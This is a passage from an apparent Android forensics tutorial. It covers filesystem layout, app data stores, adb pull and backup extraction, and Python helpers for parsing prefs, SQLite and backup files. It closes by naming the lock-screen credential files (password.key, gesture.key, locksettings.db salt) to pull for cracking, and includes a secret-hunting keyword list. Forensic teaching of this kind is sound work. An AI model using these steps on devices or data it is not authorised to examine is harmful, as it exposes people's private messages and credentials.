This filesystem defines the devices available to the applications.<strong><br />
</strong></li>
<li><strong>init – </strong>When booting the Android kernel, the init program is executed. This program is present under this folder.<strong><br />
</strong></li>
<li><strong>mnt – </strong>This directory serves as a mount point for all the filesystems, internal and external SD cards, and so on.<strong><br />
</strong></li>
<li><strong>proc – </strong>This is the mount point for the procfs
filesystem that provides access to the kernel data structures. Several
programs use /proc as the source for their information. It contains
files that have useful information about the processes.<strong><br />
</strong></li>
<li><strong>root – </strong>This is the home directory for the root account. This folder can be accessed only if the device is rooted.<strong><br />
</strong></li>
<li><strong>sbin – </strong>This contains binaries for several important daemons. This is not of much significance from a forensic perspective.<strong><br />
</strong></li>
<li><strong>misc – </strong>As the name suggests, this folder contains
information about miscellaneous settings. Information about hardware
settings, USB settings, and so on can be accessed from this folder.<strong><br />
</strong></li>
<li><strong>sdcard – </strong>This is the partition that contains the
data present on the SD card of the device. The SD card can be either
removable storage or non-removable storage. Any app on your phone with
the WRITE_EXTERNAL_STORAGE permission may create files or folders in
this location. There are some default folders, such as android_secure,
Android, DCIM, media, and so on, present on most mobiles.<strong><br />
</strong></li>
<li><strong>Digital Camera Images </strong>(<strong>DCIM</strong>) – It
is the default directory structure for digital cameras, smartphones,
tablets, and related solid-state devices. Some tablets have a photos
folder that points to the same location. Within DCIM, you will find
photos you have taken, videos, and thumbnails (cache) files. Photos are
stored in /DCIM/Camera.</li>
<li><strong>system – </strong>This directory contains libraries, system
binaries, and other system-related files. The pre-installed applications
that come along with the phone are also present in this partition. The
following screenshot shows the files present in the system partition on
an Android device:<strong><br />
</strong></li>
</ol>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn19.png" /></div>
Here are some of the interesting files and folders present in the
/system partition that are of interest to a forensic investigator –<br />
<strong>build.prop<br />
</strong><br />
This file contains all the build properties and settings for a given
device. For a forensic analyst, this file gives an overview of the
device model, manufacturer, Android version, and many other details.
Contents of this file can be viewed by issuing a cat command, as shown
in the following screenshot:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn20.png" /></div>
As shown in the preceding output, you can find out the product model,
CPU details, and Android version by viewing this file content. On a
rooted device, tweaking the build.prop file could lead to a change in
several system settings.<br />
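The following Python parser is an added example (not from the article) for the build.prop format shown above: key=value lines with # comments. The sample contents are constructed; the property names (ro.product.model, ro.build.version.release, ro.build.type, ro.secure, ro.debuggable, ro.adb.secure) are standard Android build properties. Besides the model and version summary an examiner records first, it reads ro.secure, the property that decides whether the adb daemon keeps root on a build; this is why an emulator AVD comes rooted by default, as noted in the lab setup section.<br />

```python
"""Parse /system/build.prop and summarize it (added example, not the article's code)."""

# Constructed sample modelled on a KitKat-era production build; values are invented.
SAMPLE_BUILD_PROP = """\
# begin build properties
# autogenerated by buildinfo.sh
ro.build.id=EXAMPLE.BUILD.1
ro.build.display.id=EXAMPLE.BUILD.1 release-keys
ro.build.version.sdk=19
ro.build.version.release=4.4.4
ro.build.type=user
ro.build.tags=release-keys
ro.product.model=Example Phone
ro.product.brand=ExampleCorp
ro.product.manufacturer=ExampleCorp
ro.product.cpu.abi=armeabi-v7a
ro.build.fingerprint=ExampleCorp/example/example:4.4.4/EXAMPLE.BUILD.1/1:user/release-keys
# end build properties
ro.secure=1
ro.debuggable=0
ro.adb.secure=1
"""

# Constructed sample in the shape of an emulator (eng) image, where adbd keeps root.
SAMPLE_EMULATOR_BUILD_PROP = """\
ro.build.version.sdk=19
ro.build.version.release=4.4.2
ro.build.type=eng
ro.product.model=sdk
ro.product.manufacturer=unknown
ro.secure=0
ro.debuggable=1
"""


def parse_build_prop(text):
    """Parse key=value lines; '#' comments and blank lines are ignored, later keys win,
    and a value may itself contain '=' (only the first one splits key from value)."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        props[key.strip()] = value.strip()
    return props


def device_summary(props):
    """The fields an examiner records first: maker, model, Android version, API level, build type."""
    sdk = props.get("ro.build.version.sdk")
    return {
        "manufacturer": props.get("ro.product.manufacturer"),
        "model": props.get("ro.product.model"),
        "android_version": props.get("ro.build.version.release"),
        "sdk_level": int(sdk) if sdk and sdk.isdigit() else None,
        "build_type": props.get("ro.build.type"),
        "fingerprint": props.get("ro.build.fingerprint"),
    }


def adb_root_expected(props):
    """Whether adbd will run as root on this build without any rooting step.
    AOSP's adbd drops to the shell UID only when ro.secure=1; ro.secure=0 (eng and
    emulator images) keeps it as root. On ro.debuggable=1 builds `adb root` can
    additionally restart adbd as root, which is not modelled here."""
    return props.get("ro.secure", "1") == "0"


def adb_requires_authorization(props):
    """ro.adb.secure=1 (Android 4.2.2 and later) makes adbd demand RSA key approval on the
    phone, which is the 'unauthorized' state seen in `adb devices` until the prompt is accepted."""
    return props.get("ro.adb.secure") == "1"


if __name__ == "__main__":
    for label, text in (("phone", SAMPLE_BUILD_PROP), ("emulator", SAMPLE_EMULATOR_BUILD_PROP)):
        props = parse_build_prop(text)
        print(label, device_summary(props), "adb root:", adb_root_expected(props),
              "auth:", adb_requires_authorization(props))
```

On a device, the file is read with cat /system/build.prop (or pulled with adb pull) and its text handed to parse_build_prop(). The ro.build.type and ro.secure values also explain the earlier observation about emulators: an eng or userdebug image with ro.secure=0 gives a root adb shell straight away, while a production user build does not.<br />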
<strong>app<br />
</strong><br />
This folder contains system apps and preinstalled apps. This is
mounted as read only to prevent any changes. The following screenshot
shows various system-related apps that are present in this folder:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn21.png" /></div>
Along with the APK files, you might have also noticed .odex files in
the preceding output. In Android, applications come in packages with
the .apk extension. An .odex (optimized DEX) file sits next to its APK
and holds the application’s Dalvik bytecode already optimized for this
device, so it does not have to be extracted and verified from the package
at every launch; this saves both space and start-up time. For the
examiner it matters because the code that actually runs is the .odex,
which may be more current than the classes.dex left inside the APK.<br />
<strong>framework<br />
</strong><br />
This folder contains the compiled Android framework: the JAR files (and
their matching .odex files) that implement the platform APIs and the key
services, such as the system server with the package and activity
managers. A lot of the mapping between the Java application APIs and the
native libraries is also done here.<br />
<strong>ueventd.goldfish.rc and ueventd.rc<br />
</strong><br />
These files hold the rules ueventd uses to create device nodes under /dev and set their owner and permissions; ueventd.goldfish.rc is the variant for the Android emulator’s goldfish board.<br />
<strong>Application Data Storage – </strong>Android devices store a
lot of sensitive data through the use of apps. Here is a more detailed
split of various sources of Data on Android –<br />
<ol>
<li>Apps that come along with Android</li>
<li>Apps installed by the manufacturer</li>
<li>Apps installed by a wireless carrier</li>
<li>Apps installed by the user</li>
</ol>
All of these store different types of data on the device. Application
data often contains a wealth of information that is relevant to the
investigation. Here is a sample list of possible data that can be found
on an Android device:<br />
<ul>
<li>SMS</li>
<li>MMS</li>
<li>Chat messages</li>
<li>Backups</li>
<li>E-mails</li>
<li>Call logs</li>
<li>Contacts</li>
<li>Pictures</li>
<li>Videos</li>
<li>Browser history</li>
<li>GPS data.</li>
<li>Files or documents downloaded</li>
<li>Data that belongs to installed apps (Facebook, Twitter, and other social media apps)</li>
<li>Calendar appointments</li>
</ul>
Data belonging to different applications can be stored either
internally or externally. In the case of external storage (SD card),
data can be stored in any location. However, in the case of internal
storage, the location is predefined. To be more specific, internal data
of all the apps present on the device (either system apps or
user-installed apps) is automatically saved in the /data/data
subdirectory, named after the package name. For example, the default
Android email app has a package named com.android.email, and the
internal data is stored in /data/data/com.android.email.<br />
Android provides developers with certain options to store data to the
device. Data that belongs to applications can be stored in one of the
following locations:<br />
<ul>
<li>Shared preferences</li>
<li>Internal storage</li>
<li>External storage</li>
<li>SQLite database</li>
<li>Network</li>
</ul>
Let’s understand all these in details.<br />
<strong>Shared Preferences – </strong>Shared Preferences provides a
framework to store key-value pairs of primitive data types in the .xml
format. Primitive data types include Boolean, float, int, long, and
string. Strings are stored in the <strong>Universal Character Set Transformation Format-8 </strong>(<strong>UTF-8</strong>) format. These files are typically stored in the application’s /data/data/&lt;package_name&gt;/shared_prefs path.<br />
Screenshot for Shared Preference –<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn22.png" /></div>
All the data in the key-value pair is stored in a file. Looking into
the file will help the investigator to obtain sensitive data.<br />
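As an added example (not code from the original article), the script below parses a constructed shared_prefs XML file of the kind described above and flags keys whose names suggest credentials; the package, key names and values are invented.<br />

```python
import xml.etree.ElementTree as ET

# Constructed sample in the layout SharedPreferences.Editor writes; the
# key names and values are invented, not taken from any real app.
SAMPLE_PREFS = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="session_token">eyJhbGciOi.example.token</string>
    <boolean name="logged_in" value="true" />
    <int name="launch_count" value="17" />
    <long name="last_sync_ms" value="1511757600000" />
    <float name="ui_scale" value="1.25" />
    <set name="recent_contacts">
        <string>+15550100</string>
        <string>+15550199</string>
    </set>
</map>
"""

def parse_shared_prefs(xml_text):
    """Return {key: value} with the Python type matching the element name
    Android used (string, boolean, int, long, float, set of strings).
    Unknown elements are kept as (value attribute, text) so nothing is
    silently dropped."""
    root = ET.fromstring(xml_text)
    if root.tag != "map":
        raise ValueError("not a SharedPreferences file (root element is %r)" % root.tag)
    prefs = {}
    for elem in root:
        key = elem.get("name")
        if elem.tag == "string":
            prefs[key] = elem.text or ""
        elif elem.tag == "boolean":
            prefs[key] = elem.get("value") == "true"
        elif elem.tag in ("int", "long"):
            prefs[key] = int(elem.get("value"))
        elif elem.tag == "float":
            prefs[key] = float(elem.get("value"))
        elif elem.tag == "set":
            prefs[key] = {child.text or "" for child in elem if child.tag == "string"}
        else:
            prefs[key] = (elem.get("value"), elem.text)
    return prefs

# Substrings that usually mark a credential or token; extend per case.
SECRET_HINTS = ("token", "password", "passwd", "secret", "apikey", "auth", "session", "cookie")

def flag_sensitive(prefs):
    """Keys worth looking at first during triage, sorted for stable output."""
    return sorted(k for k in prefs if any(h in k.lower() for h in SECRET_HINTS))

if __name__ == "__main__":
    parsed = parse_shared_prefs(SAMPLE_PREFS)
    for key, value in parsed.items():
        print("%-16s %r" % (key, value))
    print("likely secrets:", flag_sensitive(parsed))
```

Run it against a real file by reading the XML from /data/data/&lt;package_name&gt;/shared_prefs/ on the pulled copy; the type mapping is what makes a value like last_sync_ms usable as a timestamp instead of a string.<br />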
<strong>Internal storage – </strong>The files here are stored in the internal storage. These files are located typically in the application’s <strong>/data/data</strong> subdirectory. Data stored here is private and cannot be accessed by other applications.<br />
Even the device owner is prevented from viewing the files (unless they have root access).<br />
The following screenshot shows the details of the apps stored with their package name in the /data/data directory:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn23.png" /></div>
Internal data for each app is stored in its own folder. Usually, the
databases, lib, shared_prefs, cache, and files folders are created for
most applications.<br />
Folder description –<br />
<ul>
<li>shared_prefs – XML files of shared preferences, each holding data as key-value pairs</li>
<li>lib – Custom library files required by the app</li>
<li>files – Developer-saved files</li>
<li>cache – Files cached by the app</li>
<li>databases – SQLite databases and their journal files</li>
</ul>
<strong>External storage – </strong>Files can also be stored by
apps in external storage. External storage can be removable media,
such as an SD card, or non-removable storage that comes with the phone.
In the case of a removable SD card, data can be used on other devices
just by removing the SD card and inserting it into any other device. SD
cards are usually formatted with the FAT32 filesystem, but other
filesystems, such as EXT3 and EXT4, are also being used increasingly.
Data stored on the SD card is public and can be accessed by other
applications, provided the requesting apps have the necessary
permissions. Large files, such as images and videos, loaded by the apps
are usually stored in external storage for faster retrieval.<br />
<strong>SQLite database – </strong>SQLite is a popular database
format present in many mobile systems. SQLite databases are a rich
source of forensic data. The SQLite files used by the apps are generally
stored at /data/data/&lt;ApplicationPackageName&gt;/databases, often
accompanied by a -journal or -wal file that must be collected with them,
since it can hold changes not yet written to the main database. From a
forensic point of view, they are highly valuable since they often store a
lot of important data handled by the application. The contents of the
databases folder can be seen in the following screenshot.<br />
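The following is an added example, not from the original article, showing the checks an examiner runs on a pulled SQLite file: list the live tables, note any journal/WAL sidecars, and compare printable strings in the raw file against the live rows to surface records that were deleted but never wiped. The database it builds is a constructed stand-in for mmssms.db with invented messages; the deleted row it finds is the reason a logical copy can still yield deleted SMS.<br />

```python
import os
import re
import sqlite3
import tempfile

def build_sample_db(path):
    """Write a constructed database shaped like the telephony mmssms.db
    (just the columns needed here), then delete one message so that the
    file still carries a record the application no longer shows."""
    con = sqlite3.connect(path)
    con.execute("PRAGMA secure_delete = OFF")   # usual default: freed cells are not wiped
    con.execute("CREATE TABLE sms (_id INTEGER PRIMARY KEY, address TEXT, "
                "date INTEGER, type INTEGER, body TEXT)")
    con.executemany("INSERT INTO sms VALUES (?, ?, ?, ?, ?)", [
        (1, "+15550100", 1511757600000, 1, "meet at the usual place"),
        (2, "+15550199", 1511757660000, 2, "DELETED-MESSAGE transfer code 4471"),
        (3, "+15550100", 1511757720000, 1, "ok see you there"),
    ])
    con.commit()
    con.execute("DELETE FROM sms WHERE _id = 2")
    con.commit()
    con.close()

def build_demo():
    """Constructed evidence file in a fresh temp directory; returns its path."""
    path = os.path.join(tempfile.mkdtemp(), "mmssms.db")
    build_sample_db(path)
    return path

def dump_tables(path):
    """{table: [rows]} for every user table, opened read-only so the
    evidence copy is not modified."""
    con = sqlite3.connect("file:%s?mode=ro" % path, uri=True)
    tables = [r[0] for r in con.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'")]
    rows = {t: con.execute('SELECT * FROM "%s"' % t).fetchall() for t in tables}
    con.close()
    return rows

def sidecar_files(path):
    """Rollback-journal / WAL files beside the database can hold pages not
    yet in the main file: pull them together with the .db."""
    return [path + s for s in ("-journal", "-wal", "-shm") if os.path.exists(path + s)]

def carve_strings(path, min_len=8):
    """Printable ASCII runs from the raw file, which includes the freed
    cell space SQLite leaves behind after DELETE."""
    with open(path, "rb") as fh:
        raw = fh.read()
    return [m.group().decode() for m in re.finditer(rb"[ -~]{%d,}" % min_len, raw)]

def triage(path):
    live = dump_tables(path)
    # Everything a carved string may legitimately contain: live cell
    # values, table names (which also cover the schema SQL) and the header.
    known = {"SQLite format 3"}
    known.update(live)
    for rows in live.values():
        known.update(c for r in rows for c in r if isinstance(c, str))
    deleted = [s for s in carve_strings(path) if not any(k in s for k in known)]
    return {"tables": live, "sidecars": sidecar_files(path), "deleted_candidates": deleted}

if __name__ == "__main__":
    result = triage(build_demo())
    for table, rows in result["tables"].items():
        print("%s: %d live rows" % (table, len(rows)))
    print("sidecar files:", result["sidecars"])
    print("strings not backed by any live row:", result["deleted_candidates"])
```

The string comparison is deliberately crude: it is the quick look that tells you whether a proper SQLite record-carving pass is worth the time. The secure_delete pragma is the reason the deleted body survives; an app that turns it on, or a VACUUM, removes that chance.<br />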
<strong>Network – </strong>You can use the network to store and retrieve data on your own web-based services. To do network operations, the classes in the java.net.* and android.net.* packages can be used. These packages provide developers with the low-level APIs that are necessary to interact with the network, web servers, and so on.<br />
<h1>
Android filesystem overview</h1>
Understanding the filesystem is very important in Android forensics, as it helps us gain knowledge of how the data is stored and retrieved. This knowledge about the properties and the structure of a filesystem will prove to be useful during forensic analysis.<br />
<strong>Viewing filesystems on an Android device – </strong>The
filesystems supported by the Android k kernel can be determined by
checking the contents of the filesystems file present in the
proc folder. The content of this file can be viewed using the following
command – <strong>cat /proc/filesystems</strong><br />
<strong>Common Android filesystems – </strong>The filesystems present in Android can be divided into three main categories, which are as follows:<br />
<ul>
<li>Flash memory filesystems</li>
<li>Media-based filesystems</li>
<li>Pseudo filesystems</li>
</ul>
<strong>Flash memory filesystems – </strong>Flash memory is
non-volatile memory that keeps its contents without power and is erased
and reprogrammed in units of memory called blocks; several of the
filesystems below (JFFS2, YAFFS2, F2FS) are designed around that erase
behaviour. Common flash memory filesystems are – Extended File Allocation
Table (exFAT), Flash Friendly File System (F2FS), Journal Flash File
System version 2 (JFFS2), Yet Another Flash File System version 2
(YAFFS2), and Robust File System (RFS).<br />
<strong>Media-based filesystems – </strong>Media-based filesystems supported by
Android are – the EXTended file system (EXT2/EXT3/EXT4), File Allocation
Table (FAT), and Virtual File Allocation Table (VFAT).<br />
<strong>Pseudo filesystems – </strong>Pseudo filesystems can be
thought of as logical groupings of files. Some of the important pseudo
filesystems found on an Android device are – control group (cgroup),
rootfs, procfs, sysfs, tmpfs<br />
One can use the <strong>mount</strong> command to see different partitions and their filesystems available on the Device.<br />
<strong>Extracting Data Logically from Android Devices – </strong>The
term logical extraction means an extraction that does not recover
deleted data and does not include a full bit-by-bit copy of the evidence.
Using this method, a forensic examiner cannot be sure that they have
recovered all the data possible, since the operating system chooses
which data it allows the examiner to access. In simple terms,
logical extraction is analogous to copying and pasting a folder to
extract data from a system: the process copies only the files that the
user can access and see. If any hidden or deleted files are present in
the folder being copied, they will not be in the pasted version of the
folder.<br />
<strong>What kind of data can be recovered – </strong>Almost all kinds
of data can be recovered through logical extraction. The bulk of this
data is stored in SQLite databases, and because SQLite does not wipe
deleted records from its pages by default, it is even possible to recover
large amounts of deleted data from a logically extracted database. When
forensically analyzing an Android device, the limiting factor is whether
the forensic investigator has the ability to access all the data on the
phone, i.e. whether the investigator has root access or not.
Since the majority of the data is stored in the /data/data folder, which
the unprivileged shell user cannot read, an investigator without root
access cannot reach the application data directly. In what follows, we
assume the forensic investigator already has root access to the Android phone.<br />
<strong>Manual Extraction using ADB – </strong>The “<strong>adb pull</strong>” command can be used to pull single files or
entire directories directly from the device on to the forensic
examiner’s computer. This method is especially useful for small
examinations where the amount of data is small.<br />
For this method, <strong>USB Debugging </strong>should be enabled on the device. Enabling USB Debugging has been discussed earlier.<br />
<strong>Note</strong> – <strong>before Android 4.2.2, enabling USB
debugging was the only requirement to communicate with the device over
ADB. In Android 4.2.2, Google added Secure USB debugging option. The
Secure USB debugging option adds an additional requirement of selecting
to connect to a computer on the device’s screen; this prevents ADB
access to locked devices from untrusted computers. If Always allow from
this computer is selected, the device will store the computer’s RSA key,
and the prompt will not appear on future connections to that computer,
even if the device is locked</strong>.<br />
Once <strong>USB debugging </strong>has been enabled and the <strong>Secure USB debugging </strong>check
passed (depending on Android version), the device is ready for
examination. To verify that the device is connected and ready to use
ADB, execute the following command: <strong>adb devices</strong><br />
This should list your device. If not, please enable USB Debugging and
install device driver if needed. If everything is running correctly,
the device status should show the name of the device as shown below –<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn24.png" /><br />
<strong>Using ADB shell to determine if a device is rooted – </strong>The simplest method to determine if a device is rooted is to use the “<strong>adb shell</strong>” command. Open a terminal on the local computer and run the command “<strong>adb shell.”</strong><br />
The shell will appear one of two ways, either with $ or #<br />
The # symbol is used to indicate a root user, and the $ symbol
indicates a non-root user. If the shell returns showing #, the shell has
root access. If the shell returns $, try running the command “<strong>su.</strong>”<br />
<strong>Extracting Data using ADB pull – </strong>The ADB pull command is used to transfer files from the device to the local workstation. The format of the ADB pull command is –<br />
<strong>adb pull [-a] path_of_file_on_phone path_of_file_on_computer<br />
</strong><br />
The optional -a flag preserves the file’s timestamp and mode, which is worth keeping for the evidence record.<br />
Example – If we run the following command – “<strong>adb pull /data/data/com.android.providers.telephony/databases/mmssms.db C:/sms_data</strong>”<br />
This command pulls the SMS database file from the device and
writes it to the sms_data directory. Pull the accompanying
mmssms.db-journal (or -wal) file as well if one exists, since it can hold
changes not yet written to the main database. The database can then be
examined with a SQL browser or any other forensic tool.<br />
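Added example (not part of the original article): a small Python driver for the ADB pull workflow just described. It parses adb devices -l output to refuse an unauthorised device, checks that the shell is root, pulls the SMS database together with its journal/WAL sidecars, and verifies the copy against a hash computed on the device. The device listing and serials are constructed; it assumes adb is on the PATH and that the handset has sha256sum (toybox, Android 6 and later).<br />

```python
import hashlib
import subprocess
import sys

# What a logical SMS acquisition should take: the database plus the
# journal/WAL sidecars that may hold pages not yet merged into it.
SMS_DB = "/data/data/com.android.providers.telephony/databases/mmssms.db"
SIDECARS = ("-journal", "-wal", "-shm")

# Constructed `adb devices -l` output (the serials are invented).
SAMPLE_DEVICES = """List of devices attached
ZX1G22HQ3N             device usb:1-1 product:shamu model:Nexus_6 device:shamu
0123456789ABCDEF       unauthorized usb:1-2
"""

def device_states(devices_output):
    """{serial: state}. 'device' is usable; 'unauthorized' means the Secure
    USB debugging prompt has not been accepted on the handset; 'offline'
    usually means a cable or driver problem."""
    states = {}
    for line in devices_output.splitlines()[1:]:
        parts = line.split()
        if len(parts) >= 2:
            states[parts[0]] = parts[1]
    return states

def is_root_shell(id_output):
    """`adb shell id` starts with uid=0(root) when the shell is root."""
    return id_output.strip().startswith("uid=0(")

def pull_commands(remote, local_dir):
    """argv lists for `adb pull -a` of the file and each sidecar."""
    base = remote.rsplit("/", 1)[-1]
    return [["adb", "pull", "-a", remote + suffix, "%s/%s%s" % (local_dir, base, suffix)]
            for suffix in ("",) + SIDECARS]

def verify_copy_bytes(data, sha256sum_output):
    """Compare the host-side SHA-256 of the pulled bytes with the line that
    `adb shell sha256sum <file>` printed on the device."""
    expected = sha256sum_output.split()[0].lower()
    actual = hashlib.sha256(data).hexdigest()
    if actual != expected:
        raise RuntimeError("hash mismatch: host %s, device %s" % (actual, expected))
    return actual

def verify_copy(local_path, sha256sum_output):
    with open(local_path, "rb") as fh:
        return verify_copy_bytes(fh.read(), sha256sum_output)

def run(argv):
    return subprocess.run(argv, capture_output=True, text=True).stdout

if __name__ == "__main__":
    states = device_states(run(["adb", "devices", "-l"]))
    if "device" not in states.values():
        sys.exit("no authorised device, states: %r (accept the RSA prompt on the handset)" % states)
    if not is_root_shell(run(["adb", "shell", "id"])):
        sys.exit("adb shell is not root: try `adb root`, or `su` on a rooted device")
    out_dir = sys.argv[1] if len(sys.argv) > 1 else "."
    for cmd in pull_commands(SMS_DB, out_dir):
        subprocess.run(cmd)          # a missing sidecar is reported by adb, not fatal
    print(verify_copy("%s/mmssms.db" % out_dir, run(["adb", "shell", "sha256sum", SMS_DB])))
```

The device-side hash is the check most manual pulls skip: without it, a transfer interrupted by a flaky cable yields a truncated database that still opens in a SQLite browser and quietly shows fewer rows.<br />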
<strong>ADB backup extractions – </strong>Google implemented ADB
backup functionality, beginning in Android 4.0 Ice Cream Sandwich. This
allows forensic examiners to backup application data to a local computer
over ADB. This process does not require root and is therefore highly
useful for forensic purposes. However, it does not acquire every
application installed on the device. When a developer makes a new app,
it is set to allow backups by default, but this can be changed by the
developer. In practice, it seems the vast majority of developers leave
the default setting, which means that backups do capture most
third-party applications. Unfortunately, most Google applications
disable backups; full application data from apps such as Gmail and
Google Maps will not be included.<br />
The format of the ADB backup command is –<br />
<strong>adb backup [-f &lt;file&gt;] [-apk|-noapk] [-obb|-noobb] [-shared|-noshared] [-all] [-system|-nosystem] [&lt;packages...&gt;]<br />
</strong><br />
Options explanation:<br />
<ul>
<li>-f: Path for the output file. If not specified, defaults to backup.ab in the present working directory.</li>
<li>[-apk|-noapk]: Choose whether or not to back up the .apk files. Defaults to -noapk.</li>
<li>[-obb|-noobb]: Choose whether or not to back up .obb (APK expansion) files. Defaults to -noobb.</li>
<li>[-shared|-noshared]: Choose whether or not to back up data from shared storage and the SD card. Defaults to -noshared.</li>
<li>[-all]: Include all applications for which backups are enabled.</li>
<li>[-system|-nosystem]: Choose whether or not to include system applications. Defaults to -system.</li>
<li>[&lt;packages&gt;]: Explicitly name application packages to be backed up. Not needed if -all or -shared is used.</li>
</ul>
Example – ADB backup command to capture all possible application data would be –<br />
<strong>adb backup -f C:/Users/backup.ab -shared -all<br />
</strong><br />
Example – ADB backup command to capture a specific application’s data (here the Facebook app, whose package name is com.facebook.katana) would be –<br />
<strong>adb backup -f C:/Users/Facebook.ab com.facebook.katana<br />
</strong><br />
You should see something like:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn25.png" /></div>
When performing a backup, the user must approve the backup on the
device. This means that backups cannot be performed without bypassing
screen locks.<br />
<strong>Parsing ADB Backup – </strong>The resulting backup data is stored as a .ab
file, which is really a short text header followed by a .tar archive compressed with the <strong>Deflate </strong>(zlib) algorithm. If a password was entered on the device when the backup was created, the archive is additionally AES encrypted with a key derived from that password.<br />
There are many free utilities to turn the .ab backup file into a .tar
that can be viewed. One such utility is the Android Backup Extractor.<br />
It can be found at <a href="http://sourceforge.net/projects/adbextractor/">http://sourceforge.net/projects/adbextractor/</a><br />
To use the Android Backup Extractor, simply extract its files into
the directory with the backup. The command to run the utility is – <strong>java -jar abe.jar unpack backup.ab backup.tar</strong><br />
If the command runs properly, the command line will display as follows:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn26.png" /></div>
The first line of the output informs the examiner that the file was
not encrypted. Had it been encrypted, the examiner would have to pass
the password as an argument at the end of the command line. The .tar
file will be at the path specified on the command line, or in the current
working directory if no path is specified. Extracting the .tar file
may be done with tar on a Linux command line or with one of the many
Windows archive utilities, such as WinRAR or 7-Zip, as shown below<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn27.png" /></div>
Now that the backup has been converted to a .tar file and then
extracted, the examiner can view the data contained in the backup for
forensic investigation.<br />
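Added example, not from the article and unrelated to abe.jar: a Python parser for the .ab format described above. It reads the text header (magic, version, compressed flag, encryption), inflates the zlib-compressed payload into the tar archive, and lists the files. The sample backup it builds is constructed, with an invented package name and manifest content; encrypted backups are detected and refused rather than decrypted.<br />

```python
import io
import tarfile
import zlib

MAGIC = b"ANDROID BACKUP\n"

# Constructed backup contents, laid out the way adb backup names them:
# apps/<package>/db, /sp and /f hold databases, shared prefs and files.
SAMPLE_FILES = {
    "apps/com.example.notes/_manifest": b"com.example.notes\n1\n",
    "apps/com.example.notes/db/notes.db": b"SQLite format 3\x00" + b"\x00" * 48,
    "apps/com.example.notes/sp/prefs.xml": b"<map><string name=\"user\">alice</string></map>",
}

def parse_ab_header(data):
    """Split an .ab file into its text header and the payload that follows.
    Header lines: magic, format version, compressed flag (0/1), encryption
    ('none' or 'AES-256'); encrypted backups add salts, round count and IV."""
    if not data.startswith(MAGIC):
        raise ValueError("not an ADB backup file (bad magic)")
    parts = data.split(b"\n", 4)       # magic, version, compressed, encryption, rest
    header = {"version": int(parts[1]), "compressed": parts[2] == b"1",
              "encryption": parts[3].decode()}
    return header, parts[4]

def ab_to_tar(data):
    """The tar archive inside an unencrypted .ab; the compression is plain zlib."""
    header, payload = parse_ab_header(data)
    if header["encryption"] != "none":
        raise NotImplementedError("encrypted backup: derive the key from the password "
                                  "(abe.jar does this) before decompressing")
    return zlib.decompress(payload) if header["compressed"] else payload

def list_backup(data):
    """(name, size) of every regular file in the backup."""
    with tarfile.open(fileobj=io.BytesIO(ab_to_tar(data)), mode="r:") as tar:
        return [(m.name, m.size) for m in tar.getmembers() if m.isfile()]

def make_sample_ab(files=SAMPLE_FILES, compressed=True):
    """Build a constructed, unencrypted version-1 .ab so the parser can be
    exercised without a device."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    payload = zlib.compress(buf.getvalue()) if compressed else buf.getvalue()
    return MAGIC + b"1\n" + (b"1\n" if compressed else b"0\n") + b"none\n" + payload

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
    else:
        data = make_sample_ab()
    print(parse_ab_header(data)[0])
    for name, size in list_backup(data):
        print("%8d  %s" % (size, name))
```

Point it at a real backup.ab to get the same listing; the header check is also the quickest way to tell whether the examiner will need the device owner’s backup password before anything can be read.<br />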
<h1>
Bypassing Android Lock Screens</h1>
Lock screens are the most challenging aspect of Android forensic
examinations. While there are methods to bypass them, this can be highly
dependent on the OS version, device settings, and capability of the
examiner. Commercial forensics tools such as Cellebrite and XRY have
fairly robust bypass capabilities but are far from infallible.<br />
<strong>Lock screen types – </strong>The lock screen types are –<br />
<ul>
<li>None/Slide</li>
<li>Pattern</li>
<li>PIN</li>
<li>Password</li>
<li>
<div>
Smart Lock</div>
<ul>
<li>Trusted Face</li>
<li>Trusted Location</li>
<li>Trusted Device</li>
</ul>
</li>
</ul>
<strong>General bypass information – </strong>In all cases, bypassing the lock screen in this way requires retrieving one or more files from the device, which in turn requires root (or custom recovery) access.<br />
The files that need to be pulled to crack a PIN/password on devices before Android 4.4 are:<br />
<strong>/data/system/password.key<br />
</strong><br />
<strong>/data/data/com.android.providers.settings/databases/settings.db<br />
</strong><br />
The files that need to be pulled to crack a PIN/password on devices running Android 4.4 and higher are:<br />
<strong>/data/system/password.key<br />
</strong><br />
<strong>/data/system/locksettings.db<br />
</strong><br />
In both cases the database supplies the salt, stored under the lockscreen.password_salt key.<br />
Only one file needs to be pulled to crack a Pattern lock:<br />
<strong>/data/system/gesture.key<br />
</strong><br />
